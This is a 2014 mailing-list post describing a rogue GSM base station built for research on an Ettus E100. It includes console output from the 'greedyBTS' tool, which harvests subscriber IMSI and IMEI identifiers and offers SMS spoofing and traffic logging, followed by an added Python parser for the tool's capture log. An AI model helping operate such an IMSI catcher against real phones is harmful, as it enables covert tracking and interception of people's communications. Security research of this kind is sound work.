OpenBTS / E100 & GSM attacks.
Hacker Fantastic
hackerfantastic at googlemail.com
Fri Feb 7 14:12:26 CET 2014
Hi all,
My first attempt to send this email didn't appear to succeed so I
am re-sending without attachment. Here is a copy of some slides
https://github.com/HackerFantastic/Public/blob/master/presentations/mwri_labs-GSM-Hacking-Wireless-Mobile-Phone-Communication_2014-01-30.pdf
I wrote for a presentation on security weaknesses within GSM. I used an
Ettus E100 to develop a malicious BTS and GSM related attacks in a Faraday
cage and presented on how these attacks work to better understand them for
defensive purposes. I was able to use the E100 as a generic IP router after
I cross-compiled a new kernel with netfilter enabled. I also had to
recompile a number of the packages such as Asterisk to enable ODBC and
improved SQLite support, and I had to make some changes to Python and its
modules. I used GNURadio 3.6.4 and I had to compile a specific version of
the OpenBTS code as the recent transceiver application did not function
with the E100. I was able to get the E100 to work as a GSM/GPRS router and
do real-time call placement etc. I got it to function with real-time
support and wrote a small script to provision new devices by watching the
syslog and adding to the SQLite database.
I also used osmocom-bb to do things like use gnuplot and graph the channel
usage although the code is extremely ugly! I took RSSI measurements over a
period of time into images and then tied them together for a movie, it
isn't quite realtime but it makes pretty graphs. I mentioned how you could
implement the MS side of the GSM stack using the osmocom project and as
such am sharing the slides with the osmocom list.
Just goes to show how mighty things come in small packages! Hope this
material is useful to others on the list who may also be trying similar
experiments. I ended up creating a firmware image that could be used to dd
and boot an E100 but at this time I do not plan on hosting it for download
unless there is sufficient interest. If you need it for some reason drop me
an e-mail.
Here is an example of the output of the greedyBTS script. As an example, my
code plays "Rick Astley - never going to give you up" when a user places a
phone call and they have been provisioned with service. All of this work
was done in a Faraday cage which I obtained from Ramsey Electronics, which
had a very good frequency attenuation graph from 0 MHz all the way to 1 GHz.
root at usrp-e1xx:~# ./launch.sh
Launching asterisk
Launching HLR SMS
Launching OpenBTS
Launching Greedy BTS..
(greedyBTS ASCII-art banner, mangled by the list archive)
[+] Current CELL configuration
[-] ==========================
[-] Shortname: 'Noone'
[-] MCC: 901 MNC: 70 C0 ARFCN: 51
[-] LAC: 3336 ARFCN's: 1 BAND: 900
[-]
[-] Radio Power
[-] ===========
[-] RxGain: 47 MaxPower: 10 MinPower: 0
--> help
[+] HELP SCREEN
[-] dump imei - lists all identified IMEI
[-] dump assoc - lists all IMEI+IMSI associations
[-] dump imsi - lists all identified IMSI
[-] dump save - store a record of all identities
[-] start service - provide service to IMSI & log traffic
[-] show service - show all provisioned phones
[-] stop service - deletes an identified IMSI from HLR
[-] calls - provide call collection statistics
[-] sms - provide sms collection statistics
[!] gprs - provide gprs collection statistics
[-] cellconfig - configure cell parameters for spoofing
[-] cellinfo - dump information on current cell
[-] cellshow - list short codes for common cells
[!] sounddial - play a sound recording to an IMSI
[!] spoofsms - send a spoof SMS message to an IMSI
[!] trunksetup - display current SIP trunk details
[-] verbose - turn on real time tracing
[-] exit - leave without shutdown
[-] shutdown - bye!
--> dump imei
[+] Dumping seen handset IMEI
[-] 1: IMEI359209002648230
[-] 2: IMEI358622002760070
[-] 3: IMEI350694801239040
[-] Total IMEI identified 3
--> dump imsi
[+] Dumping IMSI capture results
[-] 1: IMSI901700000002484
[-] 2: IMSI901700000002486
[-] 3: IMSI901700000002488
[-] Total IMSI identified 3
--> dump assoc
[+] Dumping IMSI/IMEI association
[-] 1 IMEI:358622002760070 used IMSI901700000002486
[-] 2 IMEI:350694801239040 used IMSI901700000002488
[-] Total associations 2
--> show service
[+] Displaying all provisioned IMSI
[-] 1: exten: 2100 user: IMSI001010000000000
[-] 2: exten: 2339 user: IMSI901700000002484
[-] Total subscriber count 2
--> stop service
[+] Deleting IMSI from HLR
[-] Enter IMSI: IMSI901700000002484
[-] Deleted IMSI901700000002484
--> help
[+] HELP SCREEN
[-] dump imei - lists all identified IMEI
[-] dump assoc - lists all IMEI+IMSI associations
[-] dump imsi - lists all identified IMSI
[-] dump save - store a record of all identities
[-] start service - provide service to IMSI & log traffic
[-] show service - show all provisioned phones
[-] stop service - deletes an identified IMSI from HLR
[-] calls - provide call collection statistics
[-] sms - provide sms collection statistics
[!] gprs - provide gprs collection statistics
[-] cellconfig - configure cell parameters for spoofing
[-] cellinfo - dump information on current cell
[-] cellshow - list short codes for common cells
[!] sounddial - play a sound recording to an IMSI
[!] spoofsms - send a spoof SMS message to an IMSI
[!] trunksetup - display current SIP trunk details
[-] verbose - turn on real time tracing
[-] exit - leave without shutdown
[-] shutdown - bye!
--> dump imei
[+] Dumping seen handset IMEI
[-] 1: IMEI359209002648230
[-] 2: IMEI358622002760070
[-] 3: IMEI350694801239040
[-] Total IMEI identified 3
--> dump imsi
[+] Dumping IMSI capture results
[-] 1: IMSI901700000002484
[-] 2: IMSI901700000002486
[-] 3: IMSI901700000002488
[-] Total IMSI identified 3
--> dump assoc
[+] Dumping IMSI/IMEI association
[-] 1 IMEI:358622002760070 used IMSI901700000002486
[-] 2 IMEI:350694801239040 used IMSI901700000002488
[-] Total associations 2
--> dump save
[+] Saving IMSI capture results
[+] Saving seen handset IMEI
[+] Saving IMSI/IMEI association
[-] logfile stored as 'greedybts.log'
--> shutdown
root at usrp-e1xx:~# cat greedybts.log
[-] 1: IMSI901700000002484
[-] 2: IMSI901700000002486
[-] 3: IMSI901700000002488
[-] Total IMSI identified 3
[-] 1: IMEI359209002648230
[-] 2: IMEI358622002760070
[-] 3: IMEI350694801239040
[-] Total IMEI identified 3
[-] 1 IMEI:358622002760070 used IMSI901700000002486
[-] 2 IMEI:350694801239040 used IMSI901700000002488
[-] Total associations 2
Kind Regards,
Matthew
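The `greedybts.log` file shown in the transcript above has a simple line-oriented layout: numbered IMSI entries, numbered IMEI entries, IMEI-to-IMSI associations, and a "Total" line closing each group. The parser below is an added example, not code from the post or from the greedyBTS script, for an analyst who has to review such a lab capture: it turns the log into structured records, cross-checks the stated totals against the entries actually listed (a tampered or truncated log fails the check), and decomposes identifiers into their standard fields. The sample log is constructed from the values in the transcript; the two-digit MNC length is taken from the cell configuration shown above (MCC 901, MNC 70) and is an assumption that does not hold for every PLMN.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the greedybts.log contents from the post, reproduced verbatim.
SAMPLE_LOG = """\
[-] 1: IMSI901700000002484
[-] 2: IMSI901700000002486
[-] 3: IMSI901700000002488
[-] Total IMSI identified 3
[-] 1: IMEI359209002648230
[-] 2: IMEI358622002760070
[-] 3: IMEI350694801239040
[-] Total IMEI identified 3
[-] 1 IMEI:358622002760070 used IMSI901700000002486
[-] 2 IMEI:350694801239040 used IMSI901700000002488
[-] Total associations 2
"""

# One regex per line shape seen in the log. Digit counts are deliberately loose:
# IMSI is at most 15 digits, IMEI is 15 (IMEISV would be 16).
IMSI_RE = re.compile(r"^\[-\] \d+: IMSI(\d{6,15})$")
IMEI_RE = re.compile(r"^\[-\] \d+: IMEI(\d{14,16})$")
ASSOC_RE = re.compile(r"^\[-\] \d+ IMEI:(\d{14,16}) used IMSI(\d{6,15})$")
TOTAL_RE = re.compile(r"^\[-\] Total (IMSI identified|IMEI identified|associations) (\d+)$")


@dataclass
class Capture:
    imsis: list = field(default_factory=list)
    imeis: list = field(default_factory=list)
    assoc: dict = field(default_factory=dict)   # IMEI -> IMSI
    totals: dict = field(default_factory=dict)  # group name -> count claimed by the log
    unparsed: list = field(default_factory=list)


def parse_greedybts_log(text):
    """Parse greedybts.log text into a Capture; lines of unknown shape are kept, not dropped."""
    cap = Capture()
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        if m := IMSI_RE.match(line):
            cap.imsis.append(m.group(1))
        elif m := IMEI_RE.match(line):
            cap.imeis.append(m.group(1))
        elif m := ASSOC_RE.match(line):
            cap.assoc[m.group(1)] = m.group(2)
        elif m := TOTAL_RE.match(line):
            cap.totals[m.group(1)] = int(m.group(2))
        else:
            cap.unparsed.append(line)
    return cap


def consistency_errors(cap):
    """Return a list of human-readable problems; an empty list means the log is self-consistent."""
    errors = []
    expected = {
        "IMSI identified": len(cap.imsis),
        "IMEI identified": len(cap.imeis),
        "associations": len(cap.assoc),
    }
    for group, counted in expected.items():
        claimed = cap.totals.get(group)
        if claimed is None:
            errors.append(f"missing Total line for {group}")
        elif claimed != counted:
            errors.append(f"{group}: log claims {claimed}, found {counted}")
    # Every association must refer to identifiers that the log also lists on their own.
    for imei, imsi in cap.assoc.items():
        if imei not in cap.imeis:
            errors.append(f"association references unlisted IMEI {imei}")
        if imsi not in cap.imsis:
            errors.append(f"association references unlisted IMSI {imsi}")
    for line in cap.unparsed:
        errors.append(f"unrecognised line: {line!r}")
    return errors


def split_imsi(imsi, mnc_len=2):
    """Split an IMSI into (MCC, MNC, MSIN). MCC is always 3 digits; MNC length is a parameter
    because it is 2 or 3 digits depending on the PLMN (2 assumed here, matching the post's cell)."""
    return imsi[:3], imsi[3:3 + mnc_len], imsi[3 + mnc_len:]


def imei_tac(imei):
    """The Type Allocation Code is the first 8 digits of an IMEI and identifies the handset model."""
    return imei[:8]


if __name__ == "__main__":
    cap = parse_greedybts_log(SAMPLE_LOG)
    for imei, imsi in cap.assoc.items():
        print(f"TAC {imei_tac(imei)} <-> PLMN {split_imsi(imsi)[:2]}")
    print("consistency:", consistency_errors(cap) or "ok")
```

Running the script against the sample prints one line per association and reports the log as consistent; feeding it a log whose "Total" lines no longer match the entries (or whose associations cite an identifier that is not listed) yields a non-empty error list, which is the check an analyst wants before trusting a capture file that has been copied around.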